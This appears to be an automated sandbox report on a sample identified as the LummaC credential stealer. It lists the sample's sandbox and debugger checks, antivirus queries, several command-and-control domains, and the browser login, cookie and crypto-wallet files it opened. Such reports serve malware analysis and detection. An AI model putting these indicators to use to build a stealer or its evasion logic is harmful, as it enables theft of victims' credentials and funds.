Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe

Last function: Thread delayed

Source: Amcache.hve.5.dr	Binary or memory string: VMware
Source: OtHVIQ2ge4.exe, 00000000.00000003.1437664069.0000000005E3F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696497155
Source: OtHVIQ2ge4.exe, 00000000.00000003.1437664069.0000000005E3F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
Source: Amcache.hve.5.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: OtHVIQ2ge4.exe, OtHVIQ2ge4.exe, 00000000.00000003.1412566702.00000000016F2000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1572127165.00000000016E9000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1490653917.00000000016E9000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000002.1923723190.00000000016B8000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000002.1923723190.00000000016E7000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1412390385.00000000016E7000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1572011566.00000000016E7000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1515231364.00000000016E9000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1412482635.00000000016E9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: OtHVIQ2ge4.exe, 00000000.00000003.1412566702.00000000016F2000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1572127165.00000000016E9000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1490653917.00000000016E9000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000002.1923723190.00000000016E7000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1412390385.00000000016E7000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1572011566.00000000016E7000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1515231364.00000000016E9000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1412482635.00000000016E9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW]
Source: Amcache.hve.5.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: OtHVIQ2ge4.exe, 00000000.00000003.1437664069.0000000005E3F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696497155
Source: OtHVIQ2ge4.exe, 00000000.00000003.1437664069.0000000005E3F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696497155x
Source: OtHVIQ2ge4.exe, 00000000.00000003.1437664069.0000000005E3F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
Source: OtHVIQ2ge4.exe, 00000000.00000003.1437664069.0000000005E3F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
Source: OtHVIQ2ge4.exe, 00000000.00000003.1437664069.0000000005E3F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696497155d
Source: Amcache.hve.5.dr	Binary or memory string: vmci.sys
Source: OtHVIQ2ge4.exe, 00000000.00000003.1437664069.0000000005E3F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696497155x
Source: OtHVIQ2ge4.exe, 00000000.00000003.1437664069.0000000005E45000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696497155p
Source: OtHVIQ2ge4.exe, 00000000.00000003.1437664069.0000000005E3F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696497155}
Source: Amcache.hve.5.dr	Binary or memory string: VMware20,1
Source: OtHVIQ2ge4.exe, 00000000.00000003.1437664069.0000000005E3F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
Source: OtHVIQ2ge4.exe, 00000000.00000003.1437664069.0000000005E3F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696497155u
Source: Amcache.hve.5.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.5.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.5.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: OtHVIQ2ge4.exe, 00000000.00000003.1437664069.0000000005E3F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696497155f
Source: Amcache.hve.5.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.5.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: OtHVIQ2ge4.exe, 00000000.00000003.1437664069.0000000005E3F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696497155
Source: Amcache.hve.5.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.5.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: OtHVIQ2ge4.exe, 00000000.00000003.1437664069.0000000005E3F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
Source: OtHVIQ2ge4.exe, 00000000.00000003.1437664069.0000000005E3F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696497155s
Source: OtHVIQ2ge4.exe, 00000000.00000003.1437664069.0000000005E3F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
Source: Amcache.hve.5.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: OtHVIQ2ge4.exe, 00000000.00000002.1921745248.0000000000754000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: OtHVIQ2ge4.exe, 00000000.00000003.1437664069.0000000005E3F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696497155j
Source: OtHVIQ2ge4.exe, 00000000.00000003.1437664069.0000000005E3F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696497155t
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.5.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.5.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.5.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.5.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.5.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.5.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: OtHVIQ2ge4.exe, 00000000.00000003.1437664069.0000000005E3F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696497155]
Source: OtHVIQ2ge4.exe, 00000000.00000003.1437664069.0000000005E3F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696497155\|UE
Source: OtHVIQ2ge4.exe, 00000000.00000003.1437664069.0000000005E3F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696497155o
Source: OtHVIQ2ge4.exe, 00000000.00000003.1437664069.0000000005E3F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155
Source: Amcache.hve.5.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.5.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: OtHVIQ2ge4.exe, 00000000.00000003.1437664069.0000000005E3F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
Source: OtHVIQ2ge4.exe, 00000000.00000003.1437664069.0000000005E3F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696497155h
Source: OtHVIQ2ge4.exe, 00000000.00000003.1437664069.0000000005E3F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696497155
Source: Amcache.hve.5.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.5.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: OtHVIQ2ge4.exe, 00000000.00000003.1437664069.0000000005E3F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696497155
Source: OtHVIQ2ge4.exe, 00000000.00000003.1437664069.0000000005E3F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696497155
Source: Amcache.hve.5.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: OtHVIQ2ge4.exe, 00000000.00000003.1437664069.0000000005E3F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
Source: Amcache.hve.5.dr	Binary or memory string: VMware-42 27 c7 3b 45 a3 e4 a4-61 bc 19 7c 28 5c 10 19
Source: Amcache.hve.5.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: OtHVIQ2ge4.exe, 00000000.00000003.1437664069.0000000005E3F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696497155t
Source: OtHVIQ2ge4.exe, 00000000.00000002.1921745248.0000000000754000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: OtHVIQ2ge4.exe, 00000000.00000003.1437664069.0000000005E3F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696497155}
Source: OtHVIQ2ge4.exe, 00000000.00000003.1437664069.0000000005E3F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696497155x

Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: NTICE
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: SICE
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Process queried: DebugPort	Jump to behavior

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: OtHVIQ2ge4.exe, 00000000.00000003.1360373988.00000000052E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: bashfulacid.lat
Source: OtHVIQ2ge4.exe, 00000000.00000003.1360373988.00000000052E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: tentabatte.lat
Source: OtHVIQ2ge4.exe, 00000000.00000003.1360373988.00000000052E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: curverpluch.lat
Source: OtHVIQ2ge4.exe, 00000000.00000003.1360373988.00000000052E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: talkynicer.lat
Source: OtHVIQ2ge4.exe, 00000000.00000003.1360373988.00000000052E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: shapestickyr.lat
Source: OtHVIQ2ge4.exe, 00000000.00000003.1360373988.00000000052E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: manyrestro.lat
Source: OtHVIQ2ge4.exe, 00000000.00000003.1360373988.00000000052E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: slipperyloo.lat
Source: OtHVIQ2ge4.exe, 00000000.00000003.1360373988.00000000052E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: wordyfindy.lat
Source: OtHVIQ2ge4.exe, 00000000.00000003.1360373988.00000000052E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: observerfry.lat

Source: OtHVIQ2ge4.exe, 00000000.00000002.1922193530.000000000079B000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: wProgram Manager

Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.5.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: OtHVIQ2ge4.exe, 00000000.00000003.1519321399.0000000005E1E000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1572011566.00000000016D4000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1519609736.0000000005E1E000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1532941911.0000000005E1E000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000002.1923723190.00000000016D4000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1532550139.0000000005E1E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: MsMpEng.exe

Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: OtHVIQ2ge4.exe PID: 7832, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: OtHVIQ2ge4.exe	String found in binary or memory: Wallets/Electrum-LTC
Source: OtHVIQ2ge4.exe	String found in binary or memory: Wallets/ElectronCash
Source: OtHVIQ2ge4.exe	String found in binary or memory: Wallets/JAXX New Version
Source: OtHVIQ2ge4.exe	String found in binary or memory: window-state.json
Source: OtHVIQ2ge4.exe	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: OtHVIQ2ge4.exe	String found in binary or memory: ExodusWeb3
Source: OtHVIQ2ge4.exe	String found in binary or memory: Wallets/Ethereum
Source: OtHVIQ2ge4.exe, 00000000.00000003.1490591848.0000000001752000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: OtHVIQ2ge4.exe, 00000000.00000003.1572011566.00000000016CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
